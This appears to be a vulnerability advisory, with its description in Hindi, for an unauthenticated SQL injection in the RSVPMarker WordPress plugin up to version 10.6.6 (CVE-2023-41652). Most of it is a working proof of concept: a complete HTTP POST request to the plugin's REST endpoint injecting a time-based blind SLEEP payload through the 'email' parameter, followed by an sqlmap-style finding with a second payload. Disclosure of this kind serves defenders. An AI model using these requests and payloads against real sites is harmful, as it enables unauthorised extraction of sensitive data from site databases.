
RSVPMarker <= 10.6.6 - बिना प्रमाणीकरण के SQL इंजेक्शन
RSVPMarker <= 10.6.6 - अप्रमाणित SQL इंजेक्शन
WordPress के लिए RSVPMarker प्लगइन 'email' पैरामीटर के माध्यम से SQL इंजेक्शन के लिए संवेदनशील है, संस्करण 10.6.6 तक और इसमें शामिल, उपयोगकर्ता द्वारा आपूर्ति किए गए पैरामीटर पर अपर्याप्त एस्केपिंग और मौजूदा SQL क्वेरी पर पर्याप्त तैयारी की कमी के कारण। यह बिना प्रमाणीकरण वाले हमलावरों के लिए मौजूदा क्वेरीज़ में अतिरिक्त SQL क्वेरीज़ जोड़ना संभव बनाता है जिनका उपयोग डेटाबेस से संवेदनशील जानकारी निकालने के लिए किया जा सकता है।
Severity: critical
CVE ID: CVE-2023-41652
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: rsvpmaker
WPScan URL: https://www.wpscan.com/plugin/rsvpmaker
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/f655704d-70a1-40d8-ae36-39029185d262?source=api-prod
POST /wp-json/rsvpmaker/v1/rsvpmailer_member/[email protected] HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://kubernetes.docker.internal/
X-Requested-With: XMLHttpRequest
Origin: http://kubernetes.docker.internal
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
[email protected]'%20and%20(select*from(select(sleep(5)))a)--%20
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: [email protected]'XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z